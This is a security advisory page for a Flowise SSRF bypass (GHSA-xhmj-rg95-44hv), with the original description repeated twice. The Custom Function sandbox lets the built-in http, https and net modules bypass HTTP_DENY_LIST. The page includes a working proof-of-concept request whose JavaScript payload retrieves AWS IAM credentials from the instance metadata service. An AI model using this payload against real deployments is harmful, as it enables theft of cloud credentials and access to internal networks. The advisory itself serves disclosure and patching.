Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
7.1
Flowise: Hackers Can Access Internal Resources Through Custom Function
GHSA-xhmj-rg95-44hv
Summary
A security weakness in Flowise's Custom Function feature allows attackers to access internal network resources. This can happen when an authenticated user uses a built-in HTTP module in the Node.js sandbox to make requests to internal resources. To fix this, update the sandbox configuration to include protection for the built-in HTTP modules or remove them from the allowed list.
What to do
- Update henryheng flowise to version 3.1.0.
- Update henryheng flowise-components to version 3.1.0.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | henryheng | flowise |
<= 3.0.13 Fix: upgrade to 3.1.0
|
| npm | henryheng | flowise-components |
<= 3.0.13 Fix: upgrade to 3.1.0
|
Original title
Flowise: SSRF Protection Bypass via Unprotected Built-in HTTP Modules in Custom Function Sandbox
Original description
### Summary
A Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTP_DENY_LIST for axios and node-fetch libraries, the built-in Node.js `http`, `https`, and `net` modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services)
### Details
The vulnerability exists in the sandbox configuration within `packages/components/src/utils.ts`
**Vulnerable Code - Allowed Built-in Modules (Line 56):**
```typescript
export const defaultAllowBuiltInDep = [
'assert', 'buffer', 'crypto', 'events', 'http', 'https', 'net', 'path', 'querystring', 'timers',
'url', 'zlib', 'os', 'stream', 'http2', 'punycode', 'perf_hooks', 'util', 'tls', 'string_decoder', 'dns', 'dgram'
]
```
**SSRF Protection Implementation (Lines 254-261):**
```typescript
// Only axios and node-fetch are wrapped with SSRF protection
secureWrappers['axios'] = secureAxiosWrapper
secureWrappers['node-fetch'] = secureNodeFetch
const defaultNodeVMOptions: any = {
// ...
require: {
builtin: builtinDeps, // <-- http, https, net allowed here
mock: secureWrappers // <-- Only mocks axios, node-fetch
},
// ...
}
```
**Root Cause:**
- The `secureWrappers` object only contains mocked versions of `axios` and `node-fetch` that enforce `HTTP_DENY_LIST`
- The built-in `http`, `https`, and `net` modules are passed directly to the sandbox via `builtinDeps` without any SSRF protection
- Users can import these modules directly and make arbitrary HTTP requests, which completely bypasses the intended security controls
**Affected File:** `packages/components/src/utils.ts`
**Related Files:**
- `packages/components/src/httpSecurity.ts` - Contains checkDenyList() function only used by axios/node-fetch wrappers
- `packages/server/src/controllers/nodes/index.ts` - API endpoint accepting user-controlled JavaScript code
- `packages/server/src/services/nodes/index.ts` - Service layer executing the code
### PoC
**Prerequisites:**
1. Flowise instance with `HTTP_DENY_LIST` configured (e.g., `HTTP_DENY_LIST=127.0.0.1,169.254.169.254,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16`)
2. Valid API key or authenticated session
3. For full impact demonstration - Flowise running on AWS EC2 with an IAM role attached
**Verify SSRF Protection is enabled (expect a block message by policy)**
Request:
```http
POST /api/v1/node-custom-function HTTP/1.1
Host: <host>
Content-Type: application/json
Authorization: Bearer <api_key>
{
"javascriptFunction": "const axios = require('axios'); return (await axios.get('http://169.254.169.254/latest/meta-data/')).data;"
}
```
Response:
```json
{"statusCode":500,"success":false,"message":"Error: nodesService.executeCustomFunction - Error running custom function: Error: Error: NodeVM Execution Error: Error: Access to this host is denied by policy.","stack":{}}
```
**Bypass SSRF Protection using built-in http module**
Request:
```http
POST /api/v1/node-custom-function HTTP/1.1
Host: <host>
Content-Type: application/json
Authorization: Bearer <api_key>
{
"javascriptFunction": "const http = require('http'); return new Promise((resolve) => { const tokenReq = http.request({ hostname: '169.254.169.254', path: '/latest/api/token', method: 'PUT', headers: { 'X-aws-ec2-metadata-token-ttl-seconds': '21600' } }, (tokenRes) => { let token = ''; tokenRes.on('data', c => token += c); tokenRes.on('end', () => { const metaReq = http.request({ hostname: '169.254.169.254', path: '/latest/meta-data/iam/security-credentials/{IAM_Role}', headers: { 'X-aws-ec2-metadata-token': token } }, (metaRes) => { let data = ''; metaRes.on('data', c => data += c); metaRes.on('end', () => resolve(data)); }); metaReq.on('error', e => resolve('meta-error:' + e.message)); metaReq.end(); }); }); tokenReq.on('error', e => resolve('token-error:' + e.message)); tokenReq.end(); });"
}
```
Response:
```json
{
"Code": "Success",
"LastUpdated": "2026-01-08T11:30:00Z",
"Type": "AWS-HMAC",
"AccessKeyId": "ASIA...",
"SecretAccessKey": "...",
"Token": "...",
"Expiration": "2026-01-08T17:30:00Z"
}
```
<img width="1638" height="751" alt="image" src="https://github.com/user-attachments/assets/ed8b1dfd-516f-4e2b-a4ea-4dd259a8abf6" />
<img width="1633" height="986" alt="image" src="https://github.com/user-attachments/assets/12f6ecab-96df-42bc-9551-4a005ba6ba77" />
### Impact
**Vulnerability Type:** Server-Side Request Forgery (SSRF) with security controls bypass
**Who is Impacted:**
- All Flowise deployments where `HTTP_DENY_LIST` is configured for SSRF protection
- Deployments without `HTTP_DENY_LIST` are already vulnerable to SSRF via any method
**Impact Severity:**
1. Attackers can steal temporary IAM credentials from metadata services, which allows gaining access to other cloud resources
2. Scan internal networks, discover services, and identify attack targets
3. Reach databases, admin panels, and other internal APIs that should not be externally accessible
**Attack Requirements:**
- Authentication required (API key or session)
- Network access to Flowise instance
A Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTP_DENY_LIST for axios and node-fetch libraries, the built-in Node.js `http`, `https`, and `net` modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services)
### Details
The vulnerability exists in the sandbox configuration within `packages/components/src/utils.ts`
**Vulnerable Code - Allowed Built-in Modules (Line 56):**
```typescript
export const defaultAllowBuiltInDep = [
'assert', 'buffer', 'crypto', 'events', 'http', 'https', 'net', 'path', 'querystring', 'timers',
'url', 'zlib', 'os', 'stream', 'http2', 'punycode', 'perf_hooks', 'util', 'tls', 'string_decoder', 'dns', 'dgram'
]
```
**SSRF Protection Implementation (Lines 254-261):**
```typescript
// Only axios and node-fetch are wrapped with SSRF protection
secureWrappers['axios'] = secureAxiosWrapper
secureWrappers['node-fetch'] = secureNodeFetch
const defaultNodeVMOptions: any = {
// ...
require: {
builtin: builtinDeps, // <-- http, https, net allowed here
mock: secureWrappers // <-- Only mocks axios, node-fetch
},
// ...
}
```
**Root Cause:**
- The `secureWrappers` object only contains mocked versions of `axios` and `node-fetch` that enforce `HTTP_DENY_LIST`
- The built-in `http`, `https`, and `net` modules are passed directly to the sandbox via `builtinDeps` without any SSRF protection
- Users can import these modules directly and make arbitrary HTTP requests, which completely bypasses the intended security controls
**Affected File:** `packages/components/src/utils.ts`
**Related Files:**
- `packages/components/src/httpSecurity.ts` - Contains checkDenyList() function only used by axios/node-fetch wrappers
- `packages/server/src/controllers/nodes/index.ts` - API endpoint accepting user-controlled JavaScript code
- `packages/server/src/services/nodes/index.ts` - Service layer executing the code
### PoC
**Prerequisites:**
1. Flowise instance with `HTTP_DENY_LIST` configured (e.g., `HTTP_DENY_LIST=127.0.0.1,169.254.169.254,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16`)
2. Valid API key or authenticated session
3. For full impact demonstration - Flowise running on AWS EC2 with an IAM role attached
**Verify SSRF Protection is enabled (expect a block message by policy)**
Request:
```http
POST /api/v1/node-custom-function HTTP/1.1
Host: <host>
Content-Type: application/json
Authorization: Bearer <api_key>
{
"javascriptFunction": "const axios = require('axios'); return (await axios.get('http://169.254.169.254/latest/meta-data/')).data;"
}
```
Response:
```json
{"statusCode":500,"success":false,"message":"Error: nodesService.executeCustomFunction - Error running custom function: Error: Error: NodeVM Execution Error: Error: Access to this host is denied by policy.","stack":{}}
```
**Bypass SSRF Protection using built-in http module**
Request:
```http
POST /api/v1/node-custom-function HTTP/1.1
Host: <host>
Content-Type: application/json
Authorization: Bearer <api_key>
{
"javascriptFunction": "const http = require('http'); return new Promise((resolve) => { const tokenReq = http.request({ hostname: '169.254.169.254', path: '/latest/api/token', method: 'PUT', headers: { 'X-aws-ec2-metadata-token-ttl-seconds': '21600' } }, (tokenRes) => { let token = ''; tokenRes.on('data', c => token += c); tokenRes.on('end', () => { const metaReq = http.request({ hostname: '169.254.169.254', path: '/latest/meta-data/iam/security-credentials/{IAM_Role}', headers: { 'X-aws-ec2-metadata-token': token } }, (metaRes) => { let data = ''; metaRes.on('data', c => data += c); metaRes.on('end', () => resolve(data)); }); metaReq.on('error', e => resolve('meta-error:' + e.message)); metaReq.end(); }); }); tokenReq.on('error', e => resolve('token-error:' + e.message)); tokenReq.end(); });"
}
```
Response:
```json
{
"Code": "Success",
"LastUpdated": "2026-01-08T11:30:00Z",
"Type": "AWS-HMAC",
"AccessKeyId": "ASIA...",
"SecretAccessKey": "...",
"Token": "...",
"Expiration": "2026-01-08T17:30:00Z"
}
```
<img width="1638" height="751" alt="image" src="https://github.com/user-attachments/assets/ed8b1dfd-516f-4e2b-a4ea-4dd259a8abf6" />
<img width="1633" height="986" alt="image" src="https://github.com/user-attachments/assets/12f6ecab-96df-42bc-9551-4a005ba6ba77" />
### Impact
**Vulnerability Type:** Server-Side Request Forgery (SSRF) with security controls bypass
**Who is Impacted:**
- All Flowise deployments where `HTTP_DENY_LIST` is configured for SSRF protection
- Deployments without `HTTP_DENY_LIST` are already vulnerable to SSRF via any method
**Impact Severity:**
1. Attackers can steal temporary IAM credentials from metadata services, which allows gaining access to other cloud resources
2. Scan internal networks, discover services, and identify attack targets
3. Reach databases, admin panels, and other internal APIs that should not be externally accessible
**Attack Requirements:**
- Authentication required (API key or session)
- Network access to Flowise instance
ghsa CVSS3.1
7.1
Vulnerability type
CWE-284
Improper Access Control
CWE-918
Server-Side Request Forgery (SSRF)
Published: 16 Apr 2026 · Updated: 16 Apr 2026 · First seen: 16 Apr 2026